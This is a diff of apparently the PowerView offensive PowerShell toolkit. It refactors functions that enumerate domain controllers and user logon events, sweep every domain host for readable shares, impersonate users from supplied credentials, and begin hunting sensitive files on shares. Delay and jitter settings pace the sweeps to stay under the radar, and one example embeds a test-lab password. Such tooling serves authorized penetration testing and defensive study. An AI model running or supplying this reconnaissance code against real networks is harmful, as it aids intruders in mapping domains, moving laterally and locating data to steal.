+        if ($PSBoundParameters['UserDomain']) { $UserSearcherArguments['Domain'] = $UserDomain }
+        if ($PSBoundParameters['UserLDAPFilter']) { $UserSearcherArguments['LDAPFilter'] = $UserLDAPFilter }
+        if ($PSBoundParameters['UserSearchBase']) { $UserSearcherArguments['SearchBase'] = $UserSearchBase }
+        if ($PSBoundParameters['UserAdminCount']) { $UserSearcherArguments['AdminCount'] = $UserAdminCount }
+        if ($PSBoundParameters['Server']) { $UserSearcherArguments['Server'] = $Server }
+        if ($PSBoundParameters['SearchScope']) { $UserSearcherArguments['SearchScope'] = $SearchScope }
+        if ($PSBoundParameters['ResultPageSize']) { $UserSearcherArguments['ResultPageSize'] = $ResultPageSize }
+        if ($PSBoundParameters['ServerTimeLimit']) { $UserSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+        if ($PSBoundParameters['Tombstone']) { $UserSearcherArguments['Tombstone'] = $Tombstone }
+        if ($PSBoundParameters['Credential']) { $UserSearcherArguments['Credential'] = $Credential }
+
+        if ($PSBoundParameters['UserIdentity'] -or $PSBoundParameters['UserLDAPFilter'] -or $PSBoundParameters['UserSearchBase'] -or $PSBoundParameters['UserAdminCount']) {
+            $TargetUsers = Get-DomainUser @UserSearcherArguments | Select-Object -ExpandProperty samaccountname
+        }
+        elseif ($PSBoundParameters['UserGroupIdentity'] -or (-not $PSBoundParameters['Filter'])) {
+            # otherwise we're querying a specific group
+            $GroupSearcherArguments = @{
+                'Identity' = $UserGroupIdentity
+                'Recurse' = $True
+            }
+            Write-Verbose "UserGroupIdentity: $UserGroupIdentity"
+            if ($PSBoundParameters['UserDomain']) { $GroupSearcherArguments['Domain'] = $UserDomain }
+            if ($PSBoundParameters['UserSearchBase']) { $GroupSearcherArguments['SearchBase'] = $UserSearchBase }
+            if ($PSBoundParameters['Server']) { $GroupSearcherArguments['Server'] = $Server }
+            if ($PSBoundParameters['SearchScope']) { $GroupSearcherArguments['SearchScope'] = $SearchScope }
+            if ($PSBoundParameters['ResultPageSize']) { $GroupSearcherArguments['ResultPageSize'] = $ResultPageSize }
+            if ($PSBoundParameters['ServerTimeLimit']) { $GroupSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+            if ($PSBoundParameters['Tombstone']) { $GroupSearcherArguments['Tombstone'] = $Tombstone }
+            if ($PSBoundParameters['Credential']) { $GroupSearcherArguments['Credential'] = $Credential }
+            $TargetUsers = Get-DomainGroupMember @GroupSearcherArguments | Select-Object -ExpandProperty MemberName
+        }
+
+        # build the set of computers to enumerate
+        if ($PSBoundParameters['ComputerName']) {
+            $TargetComputers = $ComputerName
         }
         else {
-            ForEach ($Domain in $TargetDomains) {
-                Write-Verbose "[*] Querying domain $Domain for users of group '$GroupName'"
-                $TargetUsers += Get-NetGroupMember -GroupName $GroupName -Domain $Domain -DomainController $DomainController -Credential $Credential | ForEach-Object {
-                    $_.MemberName
-                }
+            # if not -ComputerName is passed, query the current (or target) domain for domain controllers
+            $DCSearcherArguments = @{
+                'LDAP' = $True
             }
+            if ($PSBoundParameters['Domain']) { $DCSearcherArguments['Domain'] = $Domain }
+            if ($PSBoundParameters['Server']) { $DCSearcherArguments['Server'] = $Server }
+            if ($PSBoundParameters['Credential']) { $DCSearcherArguments['Credential'] = $Credential }
+            Write-Verbose "[Find-DomainUserEvent] Querying for domain controllers in domain: $Domain"
+            $TargetComputers = Get-DomainController @DCSearcherArguments | Select-Object -ExpandProperty dnshostname
         }
-
-        if (((!$TargetUsers) -or ($TargetUsers.Count -eq 0))) {
-            throw "[!] No users found to search for!"
+        if ($TargetComputers -and ($TargetComputers -isnot [System.Array])) {
+            $TargetComputers = @(,$TargetComputers)
+        }
+        Write-Verbose "[Find-DomainUserEvent] TargetComputers length: $($TargetComputers.Length)"
+        Write-Verbose "[Find-DomainUserEvent] TargetComputers $TargetComputers"
+        if ($TargetComputers.Length -eq 0) {
+            throw '[Find-DomainUserEvent] No hosts found to enumerate'
         }
 
-        # script block that enumerates a server
+        # the host enumeration block we're using to enumerate all servers
         $HostEnumBlock = {
-            param($ComputerName, $Ping, $TargetUsers, $SearchDays, $Credential)
+            Param($ComputerName, $StartTime, $EndTime, $MaxEvents, $TargetUsers, $Filter, $Credential)
 
-            # optionally check if the server is up first
-            $Up = $True
-            if($Ping) {
-                $Up = Test-Connection -Count 1 -Quiet -ComputerName $ComputerName
-            }
-            if($Up) {
-                # try to enumerate
-                if($Credential) {
-                    Get-UserEvent -ComputerName $ComputerName -Credential $Credential -EventType 'all' -DateStart ([DateTime]::Today.AddDays(-$SearchDays)) | Where-Object {
-                        # filter for the target user set
-                        $TargetUsers -contains $_.UserName
+            ForEach ($TargetComputer in $ComputerName) {
+                $Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer
+                if ($Up) {
+                    $DomainUserEventArgs = @{
+                        'ComputerName' = $TargetComputer
                     }
-                }
-                else {
-                    Get-UserEvent -ComputerName $ComputerName -EventType 'all' -DateStart ([DateTime]::Today.AddDays(-$SearchDays)) | Where-Object {
-                        # filter for the target user set
-                        $TargetUsers -contains $_.UserName
+                    if ($StartTime) { $DomainUserEventArgs['StartTime'] = $StartTime }
+                    if ($EndTime) { $DomainUserEventArgs['EndTime'] = $EndTime }
+                    if ($MaxEvents) { $DomainUserEventArgs['MaxEvents'] = $MaxEvents }
+                    if ($Credential) { $DomainUserEventArgs['Credential'] = $Credential }
+                    if ($Filter -or $TargetUsers) {
+                        if ($TargetUsers) {
+                            Get-DomainUserEvent @DomainUserEventArgs | Where-Object {$TargetUsers -contains $_.TargetUserName}
+                        }
+                        else {
+                            $Operator = 'or'
+                            $Filter.Keys | ForEach-Object {
+                                if (($_ -eq 'Op') -or ($_ -eq 'Operator') -or ($_ -eq 'Operation')) {
+                                    if (($Filter[$_] -match '&') -or ($Filter[$_] -eq 'and')) {
+                                        $Operator = 'and'
+                                    }
+                                }
+                            }
+                            $Keys = $Filter.Keys | Where-Object {($_ -ne 'Op') -and ($_ -ne 'Operator') -and ($_ -ne 'Operation')}
+                            Get-DomainUserEvent @DomainUserEventArgs | ForEach-Object {
+                                if ($Operator -eq 'or') {
+                                    ForEach ($Key in $Keys) {
+                                        if ($_."$Key" -match $Filter[$Key]) {
+                                            $_
+                                        }
+                                    }
+                                }
+                                else {
+                                    # and all clauses
+                                    ForEach ($Key in $Keys) {
+                                        if ($_."$Key" -notmatch $Filter[$Key]) {
+                                            break
+                                        }
+                                        $_
+                                    }
+                                }
+                            }
+                        }
+                    }
+                    else {
+                        Get-DomainUserEvent @DomainUserEventArgs
                     }
                 }
             }
         }
-
     }
 
-    process {
-
-        if($Threads) {
-            Write-Verbose "Using threading with threads = $Threads"
-
-            # if we're using threading, kick off the script block with Invoke-ThreadedFunction
-            $ScriptParams = @{
-                'Ping' = $(-not $NoPing)
-                'TargetUsers' = $TargetUsers
-                'SearchDays' = $SearchDays
-                'Credential' = $Credential
-            }
-
-            # kick off the threaded script block + arguments 
-            Invoke-ThreadedFunction -ComputerName $ComputerName -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads
-        }
+    PROCESS {
+        # only ignore threading if -Delay is passed
+        if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {
 
-        else {
-            if(-not $NoPing -and ($ComputerName.count -ne 1)) {
-                # ping all hosts in parallel
-                $Ping = {param($ComputerName) if(Test-Connection -ComputerName $ComputerName -Count 1 -Quiet -ErrorAction Stop){$ComputerName}}
-                $ComputerName = Invoke-ThreadedFunction -NoImports -ComputerName $ComputerName -ScriptBlock $Ping -Threads 100
-            }
-
-            Write-Verbose "[*] Total number of active hosts: $($ComputerName.count)"
+            Write-Verbose "[Find-DomainUserEvent] Total number of hosts: $($TargetComputers.count)"
+            Write-Verbose "[Find-DomainUserEvent] Delay: $Delay, Jitter: $Jitter"
             $Counter = 0
+            $RandNo = New-Object System.Random
 
-            ForEach ($Computer in $ComputerName) {
-
+            ForEach ($TargetComputer in $TargetComputers) {
                 $Counter = $Counter + 1
 
                 # sleep for our semi-randomized interval
                 Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)
 
-                Write-Verbose "[*] Enumerating server $Computer ($Counter of $($ComputerName.count))"
-                Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $Computer, $(-not $NoPing), $TargetUsers, $SearchDays, $Credential
+                Write-Verbose "[Find-DomainUserEvent] Enumerating server $TargetComputer ($Counter of $($TargetComputers.count))"
+                $Result = Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $StartTime, $EndTime, $MaxEvents, $TargetUsers, $Filter, $Credential
+                $Result
+
+                if ($Result -and $StopOnSuccess) {
+                    Write-Verbose "[Find-DomainUserEvent] Target user found, returning early"
+                    return
+                }
             }
         }
+        else {
+            Write-Verbose "[Find-DomainUserEvent] Using threading with threads: $Threads"
+
+            # if we're using threading, kick off the script block with New-ThreadedFunction
+            $ScriptParams = @{
+                'StartTime' = $StartTime
+                'EndTime' = $EndTime
+                'MaxEvents' = $MaxEvents
+                'TargetUsers' = $TargetUsers
+                'Filter' = $Filter
+                'Credential' = $Credential
+            }
 
+            # if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params
+            New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads
+        }
     }
 }
 
 
-function Invoke-ShareFinder {
+function Find-DomainShare {
 <#
-    .SYNOPSIS
+.SYNOPSIS
 
-        This function finds the local domain name for a host using Get-NetDomain,
-        queries the domain for all active machines with Get-NetComputer, then for
-        each server it lists of active shares with Get-NetShare. Non-standard shares
-        can be filtered out with -Exclude* flags.
+Searches for computer shares on the domain. If -CheckShareAccess is passed,
+then only shares the current user has read access to are returned.
 
-        Author: @harmj0y
-        License: BSD 3-Clause
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetShare, New-ThreadedFunction  
 
-    .PARAMETER ComputerName
+.DESCRIPTION
 
-        Host array to enumerate, passable on the pipeline.
+This function enumerates all machines on the current (or specified) domain
+using Get-DomainComputer, and enumerates the available shares for each
+machine with Get-NetShare. If -CheckShareAccess is passed, then
+[IO.Directory]::GetFiles() is used to check if the current user has read
+access to the given share. If -Credential is passed, then
+Invoke-UserImpersonation is used to impersonate the specified user before
+enumeration, reverting after with Invoke-RevertToSelf.
 
-    .PARAMETER ComputerFile
+.PARAMETER ComputerName
 
-        File of hostnames/IPs to search.
+Specifies an array of one or more hosts to enumerate, passable on the pipeline.
+If -ComputerName is not passed, the default behavior is to enumerate all machines
+in the domain returned by Get-DomainComputer.
 
-    .PARAMETER ComputerFilter
+.PARAMETER ComputerDomain
 
-        Host filter name to query AD for, wildcards accepted.
+Specifies the domain to query for computers, defaults to the current domain.
 
-    .PARAMETER ComputerADSpath
+.PARAMETER ComputerLDAPFilter
 
-        The LDAP source to search through for hosts, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
-        Useful for OU queries.
+Specifies an LDAP query string that is used to search for computer objects.
 
-    .PARAMETER ExcludeStandard
+.PARAMETER ComputerSearchBase
 
-        Switch. Exclude standard shares from display (C$, IPC$, print$ etc.)
+Specifies the LDAP source to search through for computers,
+e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries.
 
-    .PARAMETER ExcludePrint
+.PARAMETER ComputerOperatingSystem
 
-        Switch. Exclude the print$ share.
+Search computers with a specific operating system, wildcards accepted.
 
-    .PARAMETER ExcludeIPC
+.PARAMETER ComputerServicePack
 
-        Switch. Exclude the IPC$ share.
+Search computers with a specific service pack, wildcards accepted.
 
-    .PARAMETER CheckShareAccess
+.PARAMETER ComputerSiteName
 
-        Switch. Only display found shares that the local user has access to.
+Search computers in the specific AD Site name, wildcards accepted.
 
-    .PARAMETER CheckAdmin
+.PARAMETER CheckShareAccess
 
-        Switch. Only display ADMIN$ shares the local user has access to.
+Switch. Only display found shares that the local user has access to.
 
-    .PARAMETER NoPing
+.PARAMETER Server
 
-        Switch. Don't ping each host to ensure it's up before enumerating.
+Specifies an Active Directory server (domain controller) to bind to.
 
-    .PARAMETER Delay
+.PARAMETER SearchScope
 
-        Delay between enumerating hosts, defaults to 0.
+Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
 
-    .PARAMETER Jitter
+.PARAMETER ResultPageSize
 
-        Jitter for the host delay, defaults to +/- 0.3.
+Specifies the PageSize to set for the LDAP searcher object.
 
-    .PARAMETER Domain
+.PARAMETER ServerTimeLimit
 
-        Domain to query for machines, defaults to the current domain.
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
 
-    .PARAMETER DomainController
+.PARAMETER Tombstone
 
-        Domain controller to reflect LDAP queries through.
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
 
-    .PARAMETER SearchForest
+.PARAMETER Credential
 
-        Switch. Search all domains in the forest for target users instead of just
-        a single domain.
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain and target systems.
 
-    .PARAMETER Threads
+.PARAMETER Delay
 
-        The maximum concurrent threads to execute.
+Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
 
-    .EXAMPLE
+.PARAMETER Jitter
 
-        PS C:\> Invoke-ShareFinder -ExcludeStandard
+Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
 
-        Find non-standard shares on the domain.
+.PARAMETER Threads
 
-    .EXAMPLE
+The number of threads to use for user searching, defaults to 20.
 
-        PS C:\> Invoke-ShareFinder -Threads 20
+.EXAMPLE
 
-        Multi-threaded share finding, replaces Invoke-ShareFinderThreaded.
+Find-DomainShare
 
-    .EXAMPLE
+Find all domain shares in the current domain.
 
-        PS C:\> Invoke-ShareFinder -Delay 60
+.EXAMPLE
 
-        Find shares on the domain with a 60 second (+/- *.3)
-        randomized delay between touching each host.
+Find-DomainShare -CheckShareAccess
 
-    .EXAMPLE
+Find all domain shares in the current domain that the current user has
+read access to.
 
-        PS C:\> Invoke-ShareFinder -ComputerFile hosts.txt
+.EXAMPLE
 
-        Find shares for machines in the specified hosts file.
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Find-DomainShare -Domain testlab.local -Credential $Cred
 
-    .LINK
-    http://blog.harmj0y.net
+Searches for domain shares in the testlab.local domain using the specified alternate credentials.
+
+.OUTPUTS
+
+PowerView.ShareInfo
 #>
 
-    [CmdletBinding()]
-    param(
-        [Parameter(Position=0,ValueFromPipeline=$True)]
-        [Alias('Hosts')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerView.ShareInfo')]
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('DNSHostName')]
         [String[]]
         $ComputerName,
 
-        [ValidateScript({Test-Path -Path $_ })]
-        [Alias('HostList')]
+        [ValidateNotNullOrEmpty()]
+        [Alias('Domain')]
         [String]
-        $ComputerFile,
+        $ComputerDomain,
 
+        [ValidateNotNullOrEmpty()]
         [String]
-        $ComputerFilter,
+        $ComputerLDAPFilter,
 
+        [ValidateNotNullOrEmpty()]
         [String]
-        $ComputerADSpath,
-
-        [Switch]
-        $ExcludeStandard,
+        $ComputerSearchBase,
 
-        [Switch]
-        $ExcludePrint,
+        [ValidateNotNullOrEmpty()]
+        [Alias('OperatingSystem')]
+        [String]
+        $ComputerOperatingSystem,
 
-        [Switch]
-        $ExcludeIPC,
+        [ValidateNotNullOrEmpty()]
+        [Alias('ServicePack')]
+        [String]
+        $ComputerServicePack,
 
-        [Switch]
-        $NoPing,
+        [ValidateNotNullOrEmpty()]
+        [Alias('SiteName')]
+        [String]
+        $ComputerSiteName,
 
+        [Alias('CheckAccess')]
         [Switch]
         $CheckShareAccess,
 
-        [Switch]
-        $CheckAdmin,
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainController')]
+        [String]
+        $Server,
 
-        [UInt32]
-        $Delay = 0,
+        [ValidateSet('Base', 'OneLevel', 'Subtree')]
+        [String]
+        $SearchScope = 'Subtree',
 
-        [Double]
-        $Jitter = .3,
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ResultPageSize = 200,
 
-        [String]
-        $Domain,
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ServerTimeLimit,
 
-        [String]
-        $DomainController,
- 
         [Switch]
-        $SearchForest,
+        $Tombstone,
 
-        [ValidateRange(1,100)] 
-        [Int]
-        $Threads
-    )
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty,
 
-    begin {
-        if ($PSBoundParameters['Debug']) {
-            $DebugPreference = 'Continue'
-        }
+        [ValidateRange(1, 10000)]
+        [Int]
+        $Delay = 0,
 
-        # random object for delay
-        $RandNo = New-Object System.Random
+        [ValidateRange(0.0, 1.0)]
+        [Double]
+        $Jitter = .3,
 
-        Write-Verbose "[*] Running Invoke-ShareFinder with delay of $Delay"
+        [Int]
+        [ValidateRange(1, 100)]
+        $Threads = 20
+    )
 
-        # figure out the shares we want to ignore
-        [String[]] $ExcludedShares = @('')
+    BEGIN {
 
-        if ($ExcludePrint) {
-            $ExcludedShares = $ExcludedShares + "PRINT$"
+        $ComputerSearcherArguments = @{
+            'Properties' = 'dnshostname'
         }
-        if ($ExcludeIPC) {
-            $ExcludedShares = $ExcludedShares + "IPC$"
+        if ($PSBoundParameters['ComputerDomain']) { $ComputerSearcherArguments['Domain'] = $ComputerDomain }
+        if ($PSBoundParameters['ComputerLDAPFilter']) { $ComputerSearcherArguments['LDAPFilter'] = $ComputerLDAPFilter }
+        if ($PSBoundParameters['ComputerSearchBase']) { $ComputerSearcherArguments['SearchBase'] = $ComputerSearchBase }
+        if ($PSBoundParameters['Unconstrained']) { $ComputerSearcherArguments['Unconstrained'] = $Unconstrained }
+        if ($PSBoundParameters['ComputerOperatingSystem']) { $ComputerSearcherArguments['OperatingSystem'] = $OperatingSystem }
+        if ($PSBoundParameters['ComputerServicePack']) { $ComputerSearcherArguments['ServicePack'] = $ServicePack }
+        if ($PSBoundParameters['ComputerSiteName']) { $ComputerSearcherArguments['SiteName'] = $SiteName }
+        if ($PSBoundParameters['Server']) { $ComputerSearcherArguments['Server'] = $Server }
+        if ($PSBoundParameters['SearchScope']) { $ComputerSearcherArguments['SearchScope'] = $SearchScope }
+        if ($PSBoundParameters['ResultPageSize']) { $ComputerSearcherArguments['ResultPageSize'] = $ResultPageSize }
+        if ($PSBoundParameters['ServerTimeLimit']) { $ComputerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+        if ($PSBoundParameters['Tombstone']) { $ComputerSearcherArguments['Tombstone'] = $Tombstone }
+        if ($PSBoundParameters['Credential']) { $ComputerSearcherArguments['Credential'] = $Credential }
+
+        if ($PSBoundParameters['ComputerName']) {
+            $TargetComputers = $ComputerName
         }
-        if ($ExcludeStandard) {
-            $ExcludedShares = @('', "ADMIN$", "IPC$", "C$", "PRINT$")
+        else {
+            Write-Verbose '[Find-DomainShare] Querying computers in the domain'
+            $TargetComputers = Get-DomainComputer @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname
         }
-
-        # if we're using a host file list, read the targets in and add them to the target list
-        if($ComputerFile) {
-            $ComputerName = Get-Content -Path $ComputerFile
+        Write-Verbose "[Find-DomainShare] TargetComputers length: $($TargetComputers.Length)"
+        if ($TargetComputers.Length -eq 0) {
+            throw '[Find-DomainShare] No hosts found to enumerate'
         }
 
-        if(!$ComputerName) { 
-            [array]$ComputerName = @()
+        # the host enumeration block we're using to enumerate all servers
+        $HostEnumBlock = {
+            Param($ComputerName, $CheckShareAccess, $TokenHandle)
 
-            if($Domain) {
-                $TargetDomains = @($Domain)
-            }
-            elseif($SearchForest) {
-                # get ALL the domains in the forest to search
-                $TargetDomains = Get-NetForestDomain | ForEach-Object { $_.Name }
-            }
-            else {
-                # use the local domain
-                $TargetDomains = @( (Get-NetDomain).name )
-            }
-                
-            ForEach ($Domain in $TargetDomains) {
-                Write-Verbose "[*] Querying domain $Domain for hosts"
-                $ComputerName += Get-NetComputer -Domain $Domain -DomainController $DomainController -Filter $ComputerFilter -ADSpath $ComputerADSpath
+            if ($TokenHandle) {
+                # impersonate the the token produced by LogonUser()/Invoke-UserImpersonation
+                $Null = Invoke-UserImpersonation -TokenHandle $TokenHandle -Quiet
             }
-        
-            # remove any null target hosts, uniquify the list and shuffle it
-            $ComputerName = $ComputerName | Where-Object { $_ } | Sort-Object -Unique | Sort-Object { Get-Random }
-            if($($ComputerName.count) -eq 0) {
-                throw "No hosts found!"
-            }
-        }
 
-        # script block that enumerates a server
-        $HostEnumBlock = {
-            param($ComputerName, $Ping, $CheckShareAccess, $ExcludedShares, $CheckAdmin)
-
-            # optionally check if the server is up first
-            $Up = $True
-            if($Ping) {
-                $Up = Test-Connection -Count 1 -Quiet -ComputerName $ComputerName
-            }
-            if($Up) {
-                # get the shares for this host and check what we find
-                $Shares = Get-NetShare -ComputerName $ComputerName
-                ForEach ($Share in $Shares) {
-                    Write-Verbose "[*] Server share: $Share"
-                    $NetName = $Share.shi1_netname
-                    $Remark = $Share.shi1_remark
-                    $Path = '\\'+$ComputerName+'\'+$NetName
-
-                    # make sure we get a real share name back
-                    if (($NetName) -and ($NetName.trim() -ne '')) {
-                        # if we're just checking for access to ADMIN$
-                        if($CheckAdmin) {
-                            if($NetName.ToUpper() -eq "ADMIN$") {
-                                try {
-                                    $Null = [IO.Directory]::GetFiles($Path)
-                                    "\\$ComputerName\$NetName `t- $Remark"
-                                }
-                                catch {
-                                    Write-Verbose "Error accessing path $Path : $_"
-                                }
-                            }
-                        }
-                        # skip this share if it's in the exclude list
-                        elseif ($ExcludedShares -NotContains $NetName.ToUpper()) {
+            ForEach ($TargetComputer in $ComputerName) {
+                $Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer
+                if ($Up) {
+                    # get the shares for this host and check what we find
+                    $Shares = Get-NetShare -ComputerName $TargetComputer
+                    ForEach ($Share in $Shares) {
+                        $ShareName = $Share.Name
+                        # $Remark = $Share.Remark
+                        $Path = '\\'+$TargetComputer+'\'+$ShareName
+
+                        if (($ShareName) -and ($ShareName.trim() -ne '')) {
                             # see if we want to check access to this share
-                            if($CheckShareAccess) {
+                            if ($CheckShareAccess) {
                                 # check if the user has access to this path
                                 try {
                                     $Null = [IO.Directory]::GetFiles($Path)
-                                    "\\$ComputerName\$NetName `t- $Remark"
+                                    $Share
                                 }
                                 catch {
-                                    Write-Verbose "Error accessing path $Path : $_"
+                                    Write-Verbose "Error accessing share path $Path : $_"
                                 }
                             }
                             else {
-                                "\\$ComputerName\$NetName `t- $Remark"
+                                $Share
                             }
                         }
                     }
                 }
             }
-        }
-
-    }
 
-    process {
-
-        if($Threads) {
-            Write-Verbose "Using threading with threads = $Threads"
-
-            # if we're using threading, kick off the script block with Invoke-ThreadedFunction
-            $ScriptParams = @{
-                'Ping' = $(-not $NoPing)
-                'CheckShareAccess' = $CheckShareAccess
-                'ExcludedShares' = $ExcludedShares
-                'CheckAdmin' = $CheckAdmin
+            if ($TokenHandle) {
+                Invoke-RevertToSelf
             }
-
-            # kick off the threaded script block + arguments 
-            Invoke-ThreadedFunction -ComputerName $ComputerName -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads
         }
 
-        else {
-            if(-not $NoPing -and ($ComputerName.count -ne 1)) {
-                # ping all hosts in parallel
-                $Ping = {param($ComputerName) if(Test-Connection -ComputerName $ComputerName -Count 1 -Quiet -ErrorAction Stop){$ComputerName}}
-                $ComputerName = Invoke-ThreadedFunction -NoImports -ComputerName $ComputerName -ScriptBlock $Ping -Threads 100
+        $LogonToken = $Null
+        if ($PSBoundParameters['Credential']) {
+            if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {
+                $LogonToken = Invoke-UserImpersonation -Credential $Credential
+            }
+            else {
+                $LogonToken = Invoke-UserImpersonation -Credential $Credential -Quiet
             }
+        }
+    }
 
-            Write-Verbose "[*] Total number of active hosts: $($ComputerName.count)"
-            $Counter = 0
+    PROCESS {
+        # only ignore threading if -Delay is passed
+        if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {
 
-            ForEach ($Computer in $ComputerName) {
+            Write-Verbose "[Find-DomainShare] Total number of hosts: $($TargetComputers.count)"
+            Write-Verbose "[Find-DomainShare] Delay: $Delay, Jitter: $Jitter"
+            $Counter = 0
+            $RandNo = New-Object System.Random
 
+            ForEach ($TargetComputer in $TargetComputers) {
                 $Counter = $Counter + 1
 
                 # sleep for our semi-randomized interval
                 Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)
 
-                Write-Verbose "[*] Enumerating server $Computer ($Counter of $($ComputerName.count))"
-                Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $Computer, $False, $CheckShareAccess, $ExcludedShares, $CheckAdmin
+                Write-Verbose "[Find-DomainShare] Enumerating server $TargetComputer ($Counter of $($TargetComputers.count))"
+                Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $CheckShareAccess, $LogonToken
             }
         }
-        
-    }
-}
-
-
-function Invoke-FileFinder {
-<#
-    .SYNOPSIS
-
-        Finds sensitive files on the domain.
-
-        Author: @harmj0y
-        License: BSD 3-Clause
-
-    .DESCRIPTION
-
-        This function finds the local domain name for a host using Get-NetDomain,
-        queries the domain for all active machines with Get-NetComputer, grabs
-        the readable shares for each server, and recursively searches every
-        share for files with specific keywords in the name.
-        If a share list is passed, EVERY share is enumerated regardless of
-        other options.
+        else {
+            Write-Verbose "[Find-DomainShare] Using threading with threads: $Threads"
 
-    .PARAMETER ComputerName
+            # if we're using threading, kick off the script block with New-ThreadedFunction
+            $ScriptParams = @{
+                'CheckShareAccess' = $CheckShareAccess
+                'TokenHandle' = $LogonToken
+            }
 
-        Host array to enumerate, passable on the pipeline.
+            # if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params
+            New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads
+        }
+    }
 
-    .PARAMETER ComputerFile
+    END {
+        if ($LogonToken) {
+            Invoke-RevertToSelf -TokenHandle $LogonToken
+        }
+    }
+}
 
-        File of hostnames/IPs to search.
 
-    .PARAMETER ComputerFilter
+function Find-InterestingDomainShareFile {
+<#
+.SYNOPSIS
 
-        Host filter name to query AD for, wildcards accepted.
+Searches for files matching specific criteria on readable shares
+in the domain.
 
-    .PARAMETER ComputerADSpath
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetShare, Find-InterestingFile, New-ThreadedFunction  
 
-        The LDAP source to search through for hosts, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
-        Useful for OU queries.
+.DESCRIPTION
 
-    .PARAMETER ShareList
+This function enumerates all machines on the current (or specified) domain
+using Get-DomainComputer, and enumerates the available shares for each
+machine with Get-NetShare. It will then use Find-InterestingFile on each
+readhable share, searching for files marching specific criteria. If -Credential
+is passed, then Invoke-UserImpersonation is used to impersonate the specified
+user before enumeration, reverting after with Invoke-RevertToSelf.
 
-        List if \\HOST\shares to search through.
+.PARAMETER ComputerName
 
-    .PARAMETER Terms
+Specifies an array of one or more hosts to enumerate, passable on the pipeline.
+If -ComputerName is not passed, the default behavior is to enumerate all machines
+in the domain returned by Get-DomainComputer.
 
-        Terms to search for.
+.PARAMETER ComputerDomain
 
-    .PARAMETER OfficeDocs
+Specifies the domain to query for computers, defaults to the current domain.
 
-        Switch. Search for office documents (*.doc*, *.xls*, *.ppt*)
+.PARAMETER ComputerLDAPFilter
 
-    .PARAMETER FreshEXEs
+Specifies an LDAP query string that is used to search for computer objects.
 
-        Switch. Find .EXEs accessed within the last week.
+.PARAMETER ComputerSearchBase
 
-    .PARAMETER LastAccessTime
+Specifies the LDAP source to search through for computers,
+e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries.
 
-        Only return files with a LastAccessTime greater than this date value.
+.PARAMETER ComputerOperatingSystem
 
-    .PARAMETER LastWriteTime
+Search computers with a specific operating system, wildcards accepted.
 
-        Only return files with a LastWriteTime greater than this date value.
+.PARAMETER ComputerServicePack
 
-    .PARAMETER CreationTime
+Search computers with a specific service pack, wildcards accepted.
 
-        Only return files with a CreationDate greater than this date value.
+.PARAMETER ComputerSiteName
 
-    .PARAMETER IncludeC
+Search computers in the specific AD Site name, wildcards accepted.
 
-        Switch. Include any C$ shares in recursive searching (default ignore).
+.PARAMETER Include
 
-    .PARAMETER IncludeAdmin
+Only return files/folders that match the specified array of strings,
+i.e. @(*.doc*, *.xls*, *.ppt*)
 
-        Switch. Include any ADMIN$ shares in recursive searching (default ignore).
+.PARAMETER SharePath
 
-    .PARAMETER ExcludeFolders
+Specifies one or more specific share paths to search, in the form \\COMPUTER\Share
 
-        Switch. Exclude folders from the search results.
+.PARAMETER ExcludedShares
 
-    .PARAMETER ExcludeHidden
+Specifies share paths to exclude, default of C$, Admin$, Print$, IPC$.
 
-        Switch. Exclude hidden files and folders from the search results.
+.PARAMETER LastAccessTime
 
-    .PARAMETER CheckWriteAccess
+Only return files with a LastAccessTime greater than this date value.
 
-        Switch. Only returns files the current user has write access to.
+.PARAMETER LastWriteTime
 
-    .PARAMETER OutFile
